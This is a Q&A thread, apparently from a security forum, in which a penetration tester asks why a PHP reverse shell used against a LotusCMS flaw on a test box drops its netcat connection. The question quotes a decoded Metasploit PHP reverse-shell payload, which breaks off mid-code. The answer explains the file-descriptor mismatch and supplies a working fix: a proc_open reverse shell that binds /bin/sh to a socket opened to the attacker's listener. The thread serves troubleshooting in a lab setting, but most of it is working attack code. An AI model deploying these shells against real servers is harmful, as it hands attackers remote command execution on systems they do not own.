Reverse PHP shell disconnecting when netcat listener

Question

Whilst performing a penetration test on a testing box, I came across a vulnerability regarding LotusCMS: https://www.exploit-db.com/exploits/18565

Rather than rely on Metasploit or Meterpreter to carry out this exploit, I read the Metasploit code and determined exactly how it was exploiting the parameter within the web page. Upon trying to use the inline PHP code (with a netcat lister on my attacking box):

sock=fsockopen("x.x.x.x",1234);exec("/bin/sh -i <&3 >&3 2>&3");

The shell connects to the netcat listener but is then instantly dropped.

Can anyone explain why netcat drops the reverse shell?

Admitently my knowledge of the stdin, stdout and stderr is non-existent? Could this be something to be with the dropping of the connection?

I also use base64 on the inline reverse shell script above (not sure if this affects anything).

Thanks in Advance!

This is the code from the Metasploit payload (decoded from base64):

/*<?php /**/ error_reporting(0); $ip = '192.168.0.82'; $port = 1337; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("base64: invalid input 

Answer 1

You are executing on a server:

$sock=fsockopen("127.0.0.1",1234); exec("/bin/sh -i <&3 >&3 2>&3"); 

while at the same time you have a netcat listening on 1234.

First issue I see, your server code is:

• connecting to ip:port
• running /bin/sh -i with input and output redirected to the fd 3 and returning the last line (don't confuse php exec with shell/C exec).

Now, if the connection opened had the fd 3, the shell will attach to that descriptor. The next descriptor to open may be fd 3. However, if it is already opened the new connection will have a different descriptor and your shell won't be plugged where you want. For instance, the above code works for mi when running php on a cli, but not when php is running as an apache module (there the socket is the fd 12 for me)

We can use this longer command to find out the highest-level file descriptor and use it in the redirection:

 passthru('FD=`ls /proc/self/fd | sort -rn | while read FD; do test -S /proc/self/fd/$FD && echo $FD && break; done`; /bin/sh -i <&$FD >&3 2>&$FD'); 

However, this has a drawback in that the shell can only redirect descriptors 1-9 so with descriptor 12, "<&12" would actually be attempting to redirect descriptor 1, not 12. And it being a socket, we can't open a new descriptor to /dev/self/fd/12 (No such device or address)

Thus, rather than attaching to the filedescriptor to the in shell script, it's much easier to do that from the php side by using a different function for running the command:

$sock = fsockopen("127.0.0.1",1234); $proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes); 

Interestingly, the shell stays open even after the enclosing script finishes, so php max_execution_time isn't an issue.